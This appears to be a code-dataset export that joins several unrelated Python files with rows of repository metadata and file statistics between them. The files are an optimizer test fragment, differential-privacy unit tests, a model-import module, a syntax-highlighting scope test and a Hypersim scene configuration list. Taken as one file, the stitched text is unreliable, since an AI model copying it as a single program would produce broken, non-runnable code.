# run the tell method
cc.tell()
# assert that counters have increased by 1
curr_iter += 1
assert cc.model["covars_proposed_iter"] == curr_iter
assert cc.model["covars_sampled_iter"] == curr_iter
assert cc.model["response_sampled_iter"] == curr_iter
# run the ask method AGAIN
cc.ask()
# run the tell method AGAIN
cc.tell()
# assert that counters have increaed by 1 yet again (this time switching from random to bayesian)
curr_iter += 1
assert cc.model["covars_proposed_iter"] == curr_iter
assert cc.model["covars_sampled_iter"] == curr_iter
assert cc.model["response_sampled_iter"] == curr_iter
| 52.923139 | 595 | 0.67173 | 9,811 | 66,101 | 4.335338 | 0.036082 | 0.042319 | 0.062444 | 0.007429 | 0.926741 | 0.918583 | 0.904759 | 0.893379 | 0.886679 | 0.881107 | 0 | 0.03944 | 0.202932 | 66,101 | 1,248 | 596 | 52.965545 | 0.767855 | 0.272946 | 0 | 0.75578 | 0 | 0.023121 | 0.172452 | 0.056773 | 0 | 0 | 0 | 0 | 0.17341 | 1 | 0.063584 | false | 0 | 0.007225 | 0.031792 | 0.111272 | 0.00289 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
5a22601a892e3fb7828839dc505a7adfa5e2603a | 8,945 | py | Python | tests/unit/query/test_sequential_statistics.py | aleph-research/diff-priv-laplace-python | 74233931a0edc1503c332d731d9aa2784ec04189 | [
"MIT"
] | 6 | 2020-04-13T01:09:38.000Z | 2020-11-11T08:01:18.000Z | tests/unit/query/test_sequential_statistics.py | aleph-research/diff-priv-laplace-python | 74233931a0edc1503c332d731d9aa2784ec04189 | [
"MIT"
] | null | null | null | tests/unit/query/test_sequential_statistics.py | aleph-research/diff-priv-laplace-python | 74233931a0edc1503c332d731d9aa2784ec04189 | [
"MIT"
] | null | null | null | import unittest
import numpy as np
from diffpriv_laplace import DiffPrivSequentialStatisticsQuery, DiffPrivStatisticKind
class TestDiffPrivSequentialStatisticsQuery(unittest.TestCase):
epsilon = 100000000
decimal_places = 2
def setUp(self):
pass
def tearDown(self):
pass
def set_seed(self):
np.random.seed(31337)
def test_query_count(self):
kinds = [
DiffPrivStatisticKind.count,
DiffPrivStatisticKind.count | DiffPrivStatisticKind.max,
DiffPrivStatisticKind.count
| DiffPrivStatisticKind.max
| DiffPrivStatisticKind.min,
DiffPrivStatisticKind.count
| DiffPrivStatisticKind.max
| DiffPrivStatisticKind.min
| DiffPrivStatisticKind.sum,
DiffPrivStatisticKind.count
| DiffPrivStatisticKind.max
| DiffPrivStatisticKind.min
| DiffPrivStatisticKind.sum
| DiffPrivStatisticKind.mean,
DiffPrivStatisticKind.count
| DiffPrivStatisticKind.max
| DiffPrivStatisticKind.min
| DiffPrivStatisticKind.sum
| DiffPrivStatisticKind.mean
| DiffPrivStatisticKind.median,
DiffPrivStatisticKind.count
| DiffPrivStatisticKind.max
| DiffPrivStatisticKind.min
| DiffPrivStatisticKind.sum
| DiffPrivStatisticKind.mean
| DiffPrivStatisticKind.median
| DiffPrivStatisticKind.proportion,
DiffPrivStatisticKind.count
| DiffPrivStatisticKind.max
| DiffPrivStatisticKind.min
| DiffPrivStatisticKind.sum
| DiffPrivStatisticKind.mean
| DiffPrivStatisticKind.median
| DiffPrivStatisticKind.proportion
| DiffPrivStatisticKind.variance,
]
query_count = DiffPrivSequentialStatisticsQuery.query_count(kinds)
self.assertAlmostEqual(query_count, np.sum(list(range(1, 9))))
def test_calculate_query_epsilon(self):
kinds = [
DiffPrivStatisticKind.count,
DiffPrivStatisticKind.count | DiffPrivStatisticKind.max,
DiffPrivStatisticKind.count
| DiffPrivStatisticKind.max
| DiffPrivStatisticKind.min,
DiffPrivStatisticKind.count
| DiffPrivStatisticKind.max
| DiffPrivStatisticKind.min
| DiffPrivStatisticKind.sum,
DiffPrivStatisticKind.count
| DiffPrivStatisticKind.max
| DiffPrivStatisticKind.min
| DiffPrivStatisticKind.sum
| DiffPrivStatisticKind.mean,
DiffPrivStatisticKind.count
| DiffPrivStatisticKind.max
| DiffPrivStatisticKind.min
| DiffPrivStatisticKind.sum
| DiffPrivStatisticKind.mean
| DiffPrivStatisticKind.median,
DiffPrivStatisticKind.count
| DiffPrivStatisticKind.max
| DiffPrivStatisticKind.min
| DiffPrivStatisticKind.sum
| DiffPrivStatisticKind.mean
| DiffPrivStatisticKind.median
| DiffPrivStatisticKind.proportion,
DiffPrivStatisticKind.count
| DiffPrivStatisticKind.max
| DiffPrivStatisticKind.min
| DiffPrivStatisticKind.sum
| DiffPrivStatisticKind.mean
| DiffPrivStatisticKind.median
| DiffPrivStatisticKind.proportion
| DiffPrivStatisticKind.variance,
]
epsilon = 360.0
expected_value = 10.0
value = DiffPrivSequentialStatisticsQuery.calculate_query_epsilon(
kinds, epsilon
)
self.assertAlmostEqual(value, expected_value)
def calculate_stats(self, data, axis=None):
stats = {
DiffPrivStatisticKind.count: np.count_nonzero(data, axis=axis),
DiffPrivStatisticKind.min: np.min(data, axis=axis),
DiffPrivStatisticKind.max: np.max(data, axis=axis),
DiffPrivStatisticKind.median: np.median(data, axis=axis),
DiffPrivStatisticKind.proportion: np.divide(
np.count_nonzero(data, axis=axis), np.size(data, axis=axis)
),
DiffPrivStatisticKind.sum: np.sum(data, axis=axis),
DiffPrivStatisticKind.mean: np.mean(data, axis=axis),
DiffPrivStatisticKind.variance: np.var(data, axis=axis),
}
return stats
def test_query_single(self):
data = np.array(list(range(0, 20)) + [100.0])
kinds = DiffPrivStatisticKind.all
expected_results = [self.calculate_stats(data)]
self.set_seed()
results = DiffPrivSequentialStatisticsQuery.query(data, kinds, self.epsilon)
self.assertEqual(len(results), len(expected_results))
for index in range(len(expected_results)):
result = results[index]
expected_result = expected_results[index]
self.assertEqual(len(result), len(expected_result))
for key, value in expected_result.items():
value = result[key]
expected_value = expected_result[key]
self.assertAlmostEqual(value, expected_value, self.decimal_places)
def test_query_single_with_axis_0(self):
data = np.array(list(range(0, 20)) + [100.0])
kinds = DiffPrivStatisticKind.all
expected_results = [self.calculate_stats(data)]
self.set_seed()
results = DiffPrivSequentialStatisticsQuery.query(
data, kinds, self.epsilon, axis=0
)
self.assertEqual(len(results), len(expected_results))
for index in range(len(expected_results)):
result = results[index]
expected_result = expected_results[index]
self.assertEqual(len(result), len(expected_result))
for key, value in expected_result.items():
value = result[key]
expected_value = expected_result[key]
self.assertAlmostEqual(value, expected_value, self.decimal_places)
def test_query_single_with_axis_1(self):
data = np.array(list(range(0, 20)) + [100.0])
kinds = DiffPrivStatisticKind.all
expected_results = [self.calculate_stats(data)]
data = np.transpose(data)
self.set_seed()
results = DiffPrivSequentialStatisticsQuery.query(
data, kinds, self.epsilon, axis=1
)
self.assertEqual(len(results), len(expected_results))
for index in range(len(expected_results)):
result = results[index]
expected_result = expected_results[index]
self.assertEqual(len(result), len(expected_result))
for key, value in expected_result.items():
value = result[key]
expected_value = expected_result[key]
self.assertAlmostEqual(value, expected_value, self.decimal_places)
def test_query_multiple_axis_0(self):
data = np.array([list(range(0, 20)) + [100.0]] * 3)
kinds = [DiffPrivStatisticKind.all] * 3
expected_results = [
self.calculate_stats(data[0]),
self.calculate_stats(data[1]),
self.calculate_stats(data[2]),
]
data = np.transpose(data)
self.set_seed()
results = DiffPrivSequentialStatisticsQuery.query(
data, kinds, self.epsilon, axis=0
)
self.assertEqual(len(results), len(expected_results))
for index in range(len(expected_results)):
result = results[index]
expected_result = expected_results[index]
self.assertEqual(len(result), len(expected_result))
for key, value in expected_result.items():
value = result[key]
expected_value = expected_result[key]
self.assertAlmostEqual(value, expected_value, self.decimal_places)
def test_query_multiple_axis_1(self):
data = np.array([list(range(0, 20)) + [100.0]] * 3)
kinds = [DiffPrivStatisticKind.all] * 3
expected_results = [
self.calculate_stats(data[0]),
self.calculate_stats(data[1]),
self.calculate_stats(data[2]),
]
self.set_seed()
results = DiffPrivSequentialStatisticsQuery.query(
data, kinds, self.epsilon, axis=1
)
self.assertEqual(len(results), len(expected_results))
for index in range(len(expected_results)):
result = results[index]
expected_result = expected_results[index]
self.assertEqual(len(result), len(expected_result))
for key, value in expected_result.items():
value = result[key]
expected_value = expected_result[key]
self.assertAlmostEqual(value, expected_value, self.decimal_places)
| 41.221198 | 85 | 0.624818 | 781 | 8,945 | 7.019206 | 0.097311 | 0.054725 | 0.137176 | 0.127691 | 0.83236 | 0.825246 | 0.815761 | 0.815761 | 0.815761 | 0.815761 | 0 | 0.012176 | 0.293013 | 8,945 | 216 | 86 | 41.412037 | 0.854681 | 0 | 0 | 0.763547 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.083744 | 1 | 0.054187 | false | 0.009852 | 0.014778 | 0 | 0.08867 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
5a284e165e146b8bfc6247eaa464a78292c0d616 | 224 | py | Python | reef/model/__init__.py | vdao/reef | 7845c5f88c877cf123898bf6618601cd0d0ba9f8 | [
"MIT"
] | null | null | null | reef/model/__init__.py | vdao/reef | 7845c5f88c877cf123898bf6618601cd0d0ba9f8 | [
"MIT"
] | 7 | 2018-03-29T13:27:40.000Z | 2018-05-07T19:01:46.000Z | reef/model/__init__.py | vdao/reef | 7845c5f88c877cf123898bf6618601cd0d0ba9f8 | [
"MIT"
] | null | null | null | from reef.model.book import Book
from reef.model.book_record import BookRecord
from reef.model.reader import Reader
from reef.model.user import User
from reef.model.category import Category
from reef.model.post import Post
| 28 | 45 | 0.834821 | 37 | 224 | 5.027027 | 0.297297 | 0.258065 | 0.419355 | 0.182796 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111607 | 224 | 7 | 46 | 32 | 0.934673 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
5a452ea4a472d11bbc9538c319c0a70e3d26957a | 6,253 | py | Python | test/functions/decl4.py | abjugard/MagicPython | 2802ded681e0ab1a1057821c1da287147d639505 | [
"MIT"
] | 1,482 | 2015-10-16T21:59:32.000Z | 2022-03-30T11:44:40.000Z | test/functions/decl4.py | abjugard/MagicPython | 2802ded681e0ab1a1057821c1da287147d639505 | [
"MIT"
] | 226 | 2015-10-15T15:53:44.000Z | 2022-03-25T03:08:27.000Z | test/functions/decl4.py | abjugard/MagicPython | 2802ded681e0ab1a1057821c1da287147d639505 | [
"MIT"
] | 129 | 2015-10-20T02:41:49.000Z | 2022-03-22T01:44:36.000Z | # testing annotations split over multiple lines
def some_func(a:
lambda x=None:
{key: val
for key, val in
(x if x is not None else [])
}=42):
# : comment.line.number-sign.python, punctuation.definition.comment.python, source.python
testing annotations split over multiple lines : comment.line.number-sign.python, source.python
def : meta.function.python, source.python, storage.type.function.python
: meta.function.python, source.python
some_func : entity.name.function.python, meta.function.python, source.python
( : meta.function.parameters.python, meta.function.python, punctuation.definition.parameters.begin.python, source.python
a : meta.function.parameters.python, meta.function.python, source.python, variable.parameter.function.language.python
: : meta.function.parameters.python, meta.function.python, punctuation.separator.annotation.python, source.python
: meta.function.parameters.python, meta.function.python, source.python
lambda : meta.function.parameters.python, meta.function.python, meta.lambda-function.python, source.python, storage.type.function.lambda.python
: meta.function.lambda.parameters.python, meta.function.parameters.python, meta.function.python, meta.lambda-function.python, source.python
x : meta.function.lambda.parameters.python, meta.function.parameters.python, meta.function.python, meta.lambda-function.python, source.python, variable.parameter.function.language.python
= : keyword.operator.python, meta.function.lambda.parameters.python, meta.function.parameters.python, meta.function.python, meta.lambda-function.python, source.python
None : constant.language.python, meta.function.lambda.parameters.python, meta.function.parameters.python, meta.function.python, meta.lambda-function.python, source.python
: : meta.function.parameters.python, meta.function.python, meta.lambda-function.python, punctuation.section.function.lambda.begin.python, source.python
: meta.function.parameters.python, meta.function.python, source.python
{ : meta.function.parameters.python, meta.function.python, punctuation.definition.dict.begin.python, source.python
key : meta.function.parameters.python, meta.function.python, source.python
: : meta.function.parameters.python, meta.function.python, punctuation.separator.dict.python, source.python
: meta.function.parameters.python, meta.function.python, source.python
val : meta.function.parameters.python, meta.function.python, source.python
: meta.function.parameters.python, meta.function.python, source.python
for : keyword.control.flow.python, meta.function.parameters.python, meta.function.python, source.python
: meta.function.parameters.python, meta.function.python, source.python
key : meta.function.parameters.python, meta.function.python, source.python
, : meta.function.parameters.python, meta.function.python, punctuation.separator.element.python, source.python
: meta.function.parameters.python, meta.function.python, source.python
val : meta.function.parameters.python, meta.function.python, source.python
: meta.function.parameters.python, meta.function.python, source.python
in : keyword.control.flow.python, meta.function.parameters.python, meta.function.python, source.python
: meta.function.parameters.python, meta.function.python, source.python
( : meta.function.parameters.python, meta.function.python, punctuation.parenthesis.begin.python, source.python
x : meta.function.parameters.python, meta.function.python, source.python
: meta.function.parameters.python, meta.function.python, source.python
if : keyword.control.flow.python, meta.function.parameters.python, meta.function.python, source.python
: meta.function.parameters.python, meta.function.python, source.python
x : meta.function.parameters.python, meta.function.python, source.python
: meta.function.parameters.python, meta.function.python, source.python
is : keyword.operator.logical.python, meta.function.parameters.python, meta.function.python, source.python
: meta.function.parameters.python, meta.function.python, source.python
not : keyword.operator.logical.python, meta.function.parameters.python, meta.function.python, source.python
: meta.function.parameters.python, meta.function.python, source.python
None : constant.language.python, meta.function.parameters.python, meta.function.python, source.python
: meta.function.parameters.python, meta.function.python, source.python
else : keyword.control.flow.python, meta.function.parameters.python, meta.function.python, source.python
: meta.function.parameters.python, meta.function.python, source.python
[ : meta.function.parameters.python, meta.function.python, punctuation.definition.list.begin.python, source.python
] : meta.function.parameters.python, meta.function.python, punctuation.definition.list.end.python, source.python
) : meta.function.parameters.python, meta.function.python, punctuation.parenthesis.end.python, source.python
: meta.function.parameters.python, meta.function.python, source.python
} : meta.function.parameters.python, meta.function.python, punctuation.definition.dict.end.python, source.python
= : keyword.operator.assignment.python, meta.function.parameters.python, meta.function.python, source.python
42 : constant.numeric.dec.python, meta.function.parameters.python, meta.function.python, source.python
) : meta.function.parameters.python, meta.function.python, punctuation.definition.parameters.end.python, source.python
: : meta.function.python, punctuation.section.function.begin.python, source.python
| 93.328358 | 198 | 0.711498 | 702 | 6,253 | 6.334758 | 0.082621 | 0.286036 | 0.388577 | 0.333708 | 0.925568 | 0.899483 | 0.874072 | 0.849562 | 0.849562 | 0.820328 | 0 | 0.00078 | 0.179754 | 6,253 | 66 | 199 | 94.742424 | 0.866251 | 0.023189 | 0 | 0.366667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
ce46e68bfdd8312ac30c4c78fa9111dd69d532f5 | 145,663 | py | Python | evermotion_dataset/_dataset_config.py | akx/ml-hypersim | 9bf9a55e1189fe92147dc64386b244c07195e3b7 | [
"AML"
] | 2 | 2021-04-19T09:18:32.000Z | 2021-08-25T15:02:51.000Z | evermotion_dataset/_dataset_config.py | lingjie0206/ml-hypersim | 2408fbafe580246108585f9c46780dc62f284cfc | [
"AML"
] | null | null | null | evermotion_dataset/_dataset_config.py | lingjie0206/ml-hypersim | 2408fbafe580246108585f9c46780dc62f284cfc | [
"AML"
] | 1 | 2020-12-20T08:06:38.000Z | 2020-12-20T08:06:38.000Z | # do not import pylab, because this file may need to be loaded from Python environments that don't necessarily have access to pylab
# from pylab import *
import os
scenes = []
#
# Archinteriors volumes 00-09
#
scenes.append({"name": "ai_001_001", "archive_file": "AI1_001.rar", "asset_file": "01", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_001_002", "archive_file": "AI1_002.rar", "asset_file": "02", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_001_003", "archive_file": "AI1_003.rar", "asset_file": "03", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_001_004", "archive_file": "AI1_004.rar", "asset_file": "04", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_001_005", "archive_file": "AI1_005.rar", "asset_file": "05", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_001_006", "archive_file": "AI1_006.rar", "asset_file": "06", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_001_007", "archive_file": "AI1_007.rar", "asset_file": "07", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_001_008", "archive_file": "AI1_008.rar", "asset_file": "08", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_001_009", "archive_file": "AI1_009.rar", "asset_file": "09", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_001_010", "archive_file": "AI1_010.rar", "asset_file": "10", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_002_001", "archive_file": "AI2_001.rar", "asset_file": "001", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_002_002", "archive_file": "AI2_002.rar", "asset_file": "002", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_002_003", "archive_file": "AI2_003.rar", "asset_file": "003", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_002_004", "archive_file": "AI2_004.rar", "asset_file": "004", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_002_005", "archive_file": "AI2_005.rar", "asset_file": "005", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_002_006", "archive_file": "AI2_006.rar", "asset_file": "006", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_002_007", "archive_file": "AI2_007.rar", "asset_file": "007", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_002_008", "archive_file": "AI2_008.rar", "asset_file": "008", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_002_009", "archive_file": "AI2_009.rar", "asset_file": "009", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_002_010", "archive_file": "AI2_010.rar", "asset_file": "010", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_003_001", "archive_file": "AI3_01.rar", "asset_file": "01", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_003_002", "archive_file": "AI3_02.rar", "asset_file": "02", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_003_003", "archive_file": "AI3_03.rar", "asset_file": "03", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_003_004", "archive_file": "AI3_04.rar", "asset_file": "04", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_003_005", "archive_file": "AI3_05.rar", "asset_file": "05", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_003_006", "archive_file": "AI3_06.rar", "asset_file": "06", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_003_007", "archive_file": "AI3_07.rar", "asset_file": "07", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_003_008", "archive_file": "AI3_08.rar", "asset_file": "08", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_003_009", "archive_file": "AI3_09.rar", "asset_file": "09", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_003_010", "archive_file": "AI3_10.rar", "asset_file": "10", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_004_001", "archive_file": "AI4_001.rar", "asset_file": "001", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_004_002", "archive_file": "AI4_002.rar", "asset_file": "002", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_004_003", "archive_file": "AI4_003.rar", "asset_file": "003", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_004_004", "archive_file": "AI4_004.rar", "asset_file": "004", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_004_005", "archive_file": "AI4_005.rar", "asset_file": "005", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_004_006", "archive_file": "AI4_006.rar", "asset_file": "006", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_004_007", "archive_file": "AI4_007.rar", "asset_file": "007", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_004_008", "archive_file": "AI4_008.rar", "asset_file": "008", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_004_009", "archive_file": "AI4_009.rar", "asset_file": "009", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_004_010", "archive_file": "AI4_010.rar", "asset_file": "010", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_005_001", "archive_file": "AI5_001.rar", "asset_file": "SCENE 01", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# bad lighting
# scenes.append({"name": "ai_005_002", "archive_file": "AI5_002.rar", "asset_file": "SCENE 02", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_005_003", "archive_file": "AI5_003.rar", "asset_file": "SCENE 03", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_005_004", "archive_file": "AI5_004.rar", "asset_file": "SCENE 04", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_005_005", "archive_file": "AI5_005.rar", "asset_file": "SCENE 05", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_005_006", "archive_file": "AI5_006.rar", "asset_file": "SCENE 06", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_005_007", "archive_file": "AI5_007.rar", "asset_file": "SCENE 07", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_005_008", "archive_file": "AI5_008.rar", "asset_file": "SCENE 08", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_005_009", "archive_file": "AI5_009.rar", "asset_file": "SCENE 09", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_005_010", "archive_file": "AI5_010.rar", "asset_file": "SCENE 10", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_006_001", "archive_file": "AI6_001.rar", "asset_file": "001", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_006_002", "archive_file": "AI6_002.rar", "asset_file": "002", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_006_003", "archive_file": "AI6_003.rar", "asset_file": "003", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_006_004", "archive_file": "AI6_004.rar", "asset_file": "004", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# slightly bad lighting
# scenes.append({"name": "ai_006_005", "archive_file": "AI6_005.rar", "asset_file": "005", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_006_006", "archive_file": "AI6_006.rar", "asset_file": "006", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_006_007", "archive_file": "AI6_007.rar", "asset_file": "007", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_006_008", "archive_file": "AI6_008.rar", "asset_file": "008", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_006_009", "archive_file": "AI6_009.rar", "asset_file": "009", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_006_010", "archive_file": "AI6_010.rar", "asset_file": "010", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_007_001", "archive_file": "AI7_01.RAR", "asset_file": "01", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_007_002", "archive_file": "AI7_02.RAR", "asset_file": "02", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# bad lighting
# scenes.append({"name": "ai_007_003", "archive_file": "AI7_03.RAR", "asset_file": "03", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_007_004", "archive_file": "AI7_04.RAR", "asset_file": "04", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_007_005", "archive_file": "AI7_05.RAR", "asset_file": "05", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_007_006", "archive_file": "AI7_06.RAR", "asset_file": "06", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_007_007", "archive_file": "AI7_07.RAR", "asset_file": "07", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_007_008", "archive_file": "AI7_08.RAR", "asset_file": "08", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_007_009", "archive_file": "AI7_09.RAR", "asset_file": "09", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_007_010", "archive_file": "AI7_10.RAR", "asset_file": "10", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_008_001", "archive_file": "AI8_01.rar", "asset_file": "01", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_008_002", "archive_file": "AI8_02.rar", "asset_file": "02", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_008_003", "archive_file": "AI8_03.rar", "asset_file": "03", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_008_004", "archive_file": "AI8_04.rar", "asset_file": "04", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_008_005", "archive_file": "AI8_05.rar", "asset_file": "05", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_008_006", "archive_file": "AI8_06.rar", "asset_file": "06", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
